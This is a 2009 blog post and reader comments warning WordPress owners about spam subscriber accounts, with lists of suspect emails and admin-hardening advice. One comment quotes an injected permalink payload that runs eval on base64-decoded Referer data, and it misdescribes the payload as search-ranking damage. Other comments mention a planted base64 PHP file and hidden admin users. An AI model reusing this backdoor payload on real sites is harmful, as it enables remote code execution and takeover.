An Open Note to WordPress Spammers & Hackers
Dear WordPress Spammer’s and Hacker’s,
You made a very STUPID mistake these past few days which allowed me to catch on to what you were doing!
First, you registered as a user on my roomie’s blog. That in and of itself wouldn’t have been something suspicious, except for the fact that he does not have the conventional registration link as I do on my blog! He purposely disabled it.
So, in order for you to have been able to register yourself, you would have had to gone through the backdoor, which only a technical user of WordPress would know, or a hacker! Nice one!
But you were busted because the roomie gets e-mailed automatically when someone registers and you didn’t register through the normal link on his site which was what made him suspicious and brought it to my attention.
That being said, you also made another stupid mistake.
You registered under the same name, and same e-mail address for my blog, and a number of my clients blogs – for which I also get e-mails when someone subscribes under the webmaster account for all my clients.
Imagine my surprise when I saw a MikeB***** being so interested in all our blogs and with probably a bogus Gmail address too! Such a diverse amount of interests you have my dear!
I am in the process of verifying the MikeB***** Gmail address and as of this writing, I’ve not received a return notice from Gmail that the user does not exist. However, I also haven’t received an email from the person to verify their first name as a legitimate user either! (Which is why I have not yet published the full name!)
WordPress users, if you have seen the Gmail address: Pulvillarrac@gmail.com in your subscribers, you may want to disable or ban the account. This is the person who registered on my roomies blog through the back door.
@henninguhle on twitter, stated that this email address is a hacker! I am also in the process of getting his permission to publish his German blog post about this here in English.
Yes, I know, you didn’t know I was so talented! {{{BLUSH}}} The problem is, I also forgot about the time difference between the US and Germany! My bad!
Also, a word to the wise for all you WordPress users out there. Bill Mitchell and I discussed this twice in the BlogTalk radio shows, but you may have not had time to listen to them so here’s a “HEADS UP”.
If you are using a default login of “admin” as a user name in your blog, login and set up a new administrator account under a different name. Anything but admin, ADMIN, Admin, Administrator, or anything resembling an admin account!
Make sure you create a password that does not include a word in the dictionary, and use a combination of upper and lowercase letters along with a number or 2 or 3 and an odd character like the $ sign or something. The longer the better.
Logout of you admin account and login to your new admin account. Then, switch the default admin account to a subscriber. And if you have an easy password, for that account, change it! And don’t use the one you are using for your new admin account under the new name. Make it different.
Consider yourself duly warned!
43 Responses to “An Open Note to WordPress Spammers & Hackers”
Leave a Reply
 |
 |
 |
|
||
 |
|
 |
|
||
I am going to look for that email on my blogs and subscribers, I don’t allow anyone to create accounts, can they still bypass this and create an account?
Reply
Debbie Mahler reply on September 1st, 2009 6:18 pm:
Yes, they can. They are using two methods. Either they are going to the typical Admin link that is custom in WP set ups, or they are entering a specific chain of instructions for PHP to get there. But the same login link that you have to sign in to your WP blog, is the same for everyone. And if you look under the login block, the link to register is there. So, even though you may have it disabled, they can still get to it!
Reply
[...] An Open Note to WordPress Spammers & Hackers | Technical Tidbits mice.org/blog/an-open-note-to-wordpress-spammers-hackers – view page – cached WordPress users take notice! If you have seen the Gmail address: Pulvillarrac@gmail.com in your subscribers, you may want to disable or ban the account. This is the person who registered on my roomies blog through the back door. — From the page [...]
Username: Andrianq
E-mail: pulvillarrac@gmail.com
Username: MikeWink
E-mail: bugbeemershonyhe@gmail.com
they hit my blog too.. look for both of these
Reply
Debbie Mahler reply on September 2nd, 2009 12:41 pm:
Thanks Beff! I appreciate all the info I can get to share this with others!
Debbie
Reply
here are three i’ve gotten recently on my blog:
Username: arnoldisby
E-mail: naomyrotenford@gmail.com
Username: Andrianq
E-mail: pulvillarrac@gmail.com
Username: MikeWink
E-mail: bugbeemershonyhe@gmail.com
Reply
Debbie Mahler reply on September 2nd, 2009 12:40 pm:
Chaz, Thank you! I didn’t know about Arnoldisby!
Mike Wink was the one I mentioned in the article but until I confirmed, I wasn’t going to accuse. But you are the 2nd person to post that and the Gmail address used, so it must be a spammer. I tried to verify the Gmail address, but apparently Gmail does not send back a response with “User not found” or anything. That’s probably why these idiots use Gmail! But that’s a subject for yet another post! (Laughing)
Thanks for responding, and I hope you visit again soon!
Debbie
Reply
thankyou! this Pulvillarrac@gmail.com subbed to my blog too. i googled it and found your page here.
i found it weird because i had like 2 subscribers in week, and i never get any subscribers.
thankyou!
Reply
Debbie Mahler reply on September 2nd, 2009 12:38 pm:
My roomie will be doing a guest blog post soon about this whole issue. He has one blog that has nothing but “Hello World” posted and the comments he gets about that is freaking hilarious! So he’s getting to be an expert on spammers!
Thanks for posting Rob and sharing! I hope you will be a regular visitor!
Debbie
Reply
Hi Debbie,
I caught at least two more and while I did not activate their accounts and they are still subscribers, one day after their intruding the very WordPress installations had been spammed with hundreds of comments from gmail addresses (thanks to Akismet!).
The attackers are:
Andrianq pulvillarrac@gmail.com
MikeWink bugbeemershonyhe@gmail.com
Miriam obierebelominepyb@gmail.com
Kind regards from Austria
Reply
Debbie Mahler reply on September 2nd, 2009 12:36 pm:
MikeWink was the name I didn’t include because I wanted to verify the e-mail address was bogus before I published it. It appears that Gmail does not respond with a “No User” notice so I could not confirm it. Thanks for sharing that because now I know he’s bogus too. And I didn’t know about Miriam!
Yes, I love Akismet and Bad Behavior! Saved my assets several times between the two!
Thank you so much for commenting and sharing!
Debbie
Reply
[...] I will promote the advice by another savvy and alert Wordpresser who caught one of the same addresses registering at his site. Don’t use the default admin user [...]
Just found your site through the same search for new registrants to my site. I put up a similar warning post to track back here. We should try to get as complete a list together of the names being used.
Reply
Debbie Mahler reply on September 3rd, 2009 1:33 pm:
David, you’ll notice I added myself as a user to your site too, and commented! Thank you so much. I agree, the entire WP community needs to share this info! Thank you again! Debbie
Reply
Thanks for the post. I just recently started receiving these as well. I will make a post on my site to notify other users. Here are the Username/Email I have had so far:
Username: rafaellabove
E-mail: jonatanwebsterbaum@gmail.com
Username: Andrianq
E-mail: pulvillarrac@gmail.com
Username: MikeWink
E-mail: bugbeemershonyhe@gmail.com
Username: Miriam
E-mail: obierebelominepyb@gmail.com
Reply
Debbie Mahler reply on September 3rd, 2009 1:33 pm:
Jason, Thanks! rafaellabove is a new one I’ve not seen! Debbie
Reply
[...] My apologies if you have received any strange messages pretending to be from this site. A spammer hacked in and registered as a user. This is part of an ongoing problem throughout Europe. See these sites to see what’s been going on: Technical Tidbits. [...]
Rob,
I felt the same way. I’ve had my blog up for 2 years, and have never gotten a subscriber. But in the span of three days I got a total of three subscribers (one each day). I didn’t know what to think at first, except that my gut told me something was fishy. My wife suggested googling the email addresses, and that’s what landed me here. I deleted those three users and changed my password the very minute I finished reading the post.
Kind of scary.
Reply
I also received subscriber notifications this week for Andrianq – pulvillarrac@gmail.com and
MikeWink – bugbeemershonyhe@gmail.com
I googled and found both listed as spammers/hackers and promptly deleted their accounts. I have my blog set up to notify me of comments and subscriptions. No one is allowed to sign up in any other capacity. So far so good.
Thanks for posting this info!
Reply
Thank you so much for this timely post! ALL of the above addresses were listed as subscribers on my blog. What made me suspicious was also 3 new subscribers overnight, all with weird names and no comments / pingbacks.
This post was so helpful. I have changed my admin settings and am relieved to have solved the mystery so quickly and easily.
Have an awesome day!
Reply
Debbie Mahler reply on September 3rd, 2009 1:34 pm:
Lauren, Thank you for taking the time to comment! I appreciate it! Do check back with us again! Debbie
Reply
Ever since we started allowing people to register on our blog we’ve been recieving notifications of new users who have a distict spammy look to them.
Up until now we haven’t deleted any of them so they are all still listed as subscribers. I haven’t seen any damage due to having them subscribe, but after coming across your post I’m wondering if I’m being too lax.
Can they possibly hack their way into areas they have no business accessing just because I’ve allowed them to subscribe?
Thanks for any insight you can share with me.
Reply
Debbie Mahler reply on September 3rd, 2009 1:37 pm:
At this present time Marilyn, No. But that doesn’t stop them from trying. The good thing is that the WP community keeps the security issues patched regularly, so just make sure you are always using the current version, AND, that you change the default ADMIN account as recommended. Debbie
Reply
Thom Harvick reply on September 4th, 2009 4:52 pm:
they changed my urls to add this on the end
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
so they can damage your s.e. position
Reply
Wow, thank you very much for the quick response. I will definitely take your recommendation to change the Admin username and I guess I’ll just keep a very close eye on things for the time being.
If I notice anything fishy I will definitely pass it along.
Thank you.
Reply
[...] http://mice.org/blog/an-open-note-to-wordpress-spammers-hackers/ [...]
I found your site because………..wait for it wait for it……… Yup, Adrianq got me too. I checked my log, and found my urls had been changed just moments b4 I was on. the e-mail Pulvillarrac@gmail.com is what wasa used. My site http://corporateabuse.net should not see any horrible effects since I caught it fairly soon. I hope you can make something happen with the info you have. if not, Karma will get them
Reply
I too came here via a Google search once I saw that I had “acquired” 3 subscribers, and like so many of the others that have posted here, I’ve never had subscribers before.
So now, no one is allowed to subscribe without emailing me first, and I’ve changed the default admin account as suggested.
Many thanks Debbie. Who knows how many people this post will help and protect.
Bright Blessings to you.
Ross – Tolemac
Reply
username:caseyizarraras
email:jonatanwebsterbaum@gmail.com
Found it this morning, 9/5/2009.
Reply
Yes, I had Mike Wink bugbeemershonyhe@gmail.com as a user on two accounts that he shouldn’t have been. I’m checking others.
Reply
[...] http://mice.org/blog/an-open-note-to-wordpress-spammers-hackers/ [...]
For three days between 8/31/09 to 9/2/09, I got one new subscriber each day for a blog I haven’t updated in almost a year.
Username: Andrianq
E-mail: pulvillarrac@gmail.com
Username: adriankellom
E-mail: jonatanwebsterbaum@gmail.com
Username: MikeWink
E-mail: bugbeemershonyhe@gmail.com
Reply
Dear WordPress Spammer’s and Hacker’s,
You made a very STUPID mistake these past few days which allowed me to catch on to what you were doing! [...]
Confirming the following:
Username: MikeWink
E-mail: bugbeemershonyhe@gmail.com
Signed up as subscriber on one of my WP blogs.
The next day, there was a new user GayleRodger64 with no email address for just one day. This was followed by RogerRizo63, also with no email address but with admin privileges. That was when the js script was injected into the db and my permalinks started failing. (I have incremental backups of my database.)
Reply
Hey good stuff…keep up the good work! I read a lot of blogs on a daily basis and for the most part, people lack substance but, I just wanted to make a quick comment to say I’m glad I found your blog. Thanks,)
A definite great read…:)
-Bill-Bartmann
Reply
Thank you so much for leting me know this especially about Username: Andrianq
E-mail: pulvillarrac@gmail.com
I noticed a bunch of minor irregularities on my blog. I have now shut down all subscribers- I make my money from people that find my site from the search engine anyway.
I have now bookmarked your site and will try to give it a plug in an applicable Blog. Thanks Again. You are the Man!
Reply
Hey firstly thanks for posting this. Helped me narrow down a few suspicious “subscribers”
I was perusing my uploads folder via FTP and noticed in my 2009/02/ directory there was a php file there that i did not put there. the file was “963991.php” (filled with some base 64 gibberish)so immediately i knew something was up. i updated my WP to the current version and then logged into myPHPadmin to check out my DB user tables. and sure enough there was a user with no email or any other credentials in there. that did not show up in the WP dashboard. so they are able to cause mass damage if they can upload a php file and add admin users.
I would definitely recommend to any one with these “subscribers” to check your user tables. and your upload directories (specifically September’s)then remove anything un-authorized.
Reply
O'Ryan reply on October 13th, 2009 2:49 pm:
oops i meant i found the PHP file in my 2009/09 directory. my mind has too many numbers floating around right now. lol
Reply
Debbie Mahler reply on October 23rd, 2009 10:07 am:
Thanks for all that information! And I’m so happy you found the file and the database entry! Great advice. I appreciate you commenting and letting everyone know how to check for this.
Reply
[...] you’ve been following our blog tracking the WordPress suspicious subscribers starting with, An Open Note to WordPress Spammers & Hackers, and then, Adding to the WP Hacking Post, you’ll know many people are listing suspicious [...]
Thank you for this. I’ve started a list of my own having found several “hacker” email addresses and registrations on our web site. We have disabled registration for the moment in the hope of combating them.
Reply
hi !
you can add this email “makilovitalcamader@gmail.com” to your hacker list !
my wordpress has been subscribe and (i guess) hacked!
i can’t manage to login in my usual ftp account to alter my website !
any help please !
Reply
Debbie Mahler reply on February 9th, 2010 12:04 pm:
Michael, If you cannot login to your FTP, you need to start your process by contacting your web host company. Explain what happened and get them to reset your account. That’s where you start.
Reply